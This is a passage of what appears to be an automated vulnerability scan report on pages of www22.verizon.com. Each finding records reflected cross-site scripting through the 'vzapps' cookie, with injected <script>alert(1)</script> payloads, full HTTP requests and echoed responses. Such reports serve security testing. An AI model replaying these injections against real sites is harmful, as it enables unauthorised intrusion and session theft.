Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe17ad'><script>alert(1)</script>33b4d098683; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119104
Expires: Sat, 20 Nov 2010 00:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=TXe17ad'><script>alert(1)</script>33b4d098683; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE17AD'><SCRIPT>ALERT(1)</SCRIPT>33B4D098683 ' />
...[SNIP]...

3.163. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload af6d8<script>alert(1)</script>b1212cf33ee was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXaf6d8<script>alert(1)</script>b1212cf33ee; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119100
Expires: Sat, 20 Nov 2010 00:14:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/
Set-Cookie: ContextInfo_State=TXaf6d8<script>alert(1)</script>b1212cf33ee; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAF6D8<SCRIPT>ALERT(1)</SCRIPT>B1212CF33EE </DIV>
...[SNIP]...

3.164. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1de'><script>alert(1)</script>c5602c17654 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8d1de'><script>alert(1)</script>c5602c17654; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119136
Expires: Sat, 20 Nov 2010 00:13:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX8d1de'><script>alert(1)</script>c5602c17654; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8D1DE'><SCRIPT>ALERT(1)</SCRIPT>C5602C17654 ' />
...[SNIP]...

3.165. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 46d05<script>alert(1)</script>d1f2b7396b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX46d05<script>alert(1)</script>d1f2b7396b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119132
Expires: Sat, 20 Nov 2010 00:14:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/
Set-Cookie: ContextInfo_State=TX46d05<script>alert(1)</script>d1f2b7396b5; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX46D05<SCRIPT>ALERT(1)</SCRIPT>D1F2B7396B5 </DIV>
...[SNIP]...

3.166. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 97b68<script>alert(1)</script>c16b73f542d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX97b68<script>alert(1)</script>c16b73f542d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117590
Expires: Sat, 20 Nov 2010 00:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX97b68<script>alert(1)</script>c16b73f542d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX97B68<SCRIPT>ALERT(1)</SCRIPT>C16B73F542D </DIV>
...[SNIP]...

3.167. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee786'><script>alert(1)</script>78ce639b9c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXee786'><script>alert(1)</script>78ce639b9c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119134
Expires: Sat, 20 Nov 2010 00:12:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=TXee786'><script>alert(1)</script>78ce639b9c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXEE786'><SCRIPT>ALERT(1)</SCRIPT>78CE639B9C ' />
...[SNIP]...

3.168. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 513ee<script>alert(1)</script>274881b5bf8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX513ee<script>alert(1)</script>274881b5bf8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 148890
Expires: Sat, 20 Nov 2010 00:12:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:18 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX513EE<SCRIPT>ALERT(1)</SCRIPT>274881B5BF8 </DIV>
...[SNIP]...

3.169. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c469d'><script>alert(1)</script>c411bde7de8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc469d'><script>alert(1)</script>c411bde7de8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 148894
Expires: Sat, 20 Nov 2010 00:11:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:52 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC469D'><SCRIPT>ALERT(1)</SCRIPT>C411BDE7DE8 ' />
...[SNIP]...

3.170. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3a42'><script>alert(1)</script>fbf87ca090d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb3a42'><script>alert(1)</script>fbf87ca090d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102485
Expires: Sat, 20 Nov 2010 00:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=TXb3a42'><script>alert(1)</script>fbf87ca090d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB3A42'><SCRIPT>ALERT(1)</SCRIPT>FBF87CA090D ' />
...[SNIP]...

3.171. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 184ee<script>alert(1)</script>f56d57ce32c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX184ee<script>alert(1)</script>f56d57ce32c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102481
Expires: Sat, 20 Nov 2010 00:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX184ee<script>alert(1)</script>f56d57ce32c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX184EE<SCRIPT>ALERT(1)</SCRIPT>F56D57CE32C </DIV>
...[SNIP]...

3.172. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18907'><script>alert(1)</script>cc88d71fd80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX18907'><script>alert(1)</script>cc88d71fd80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

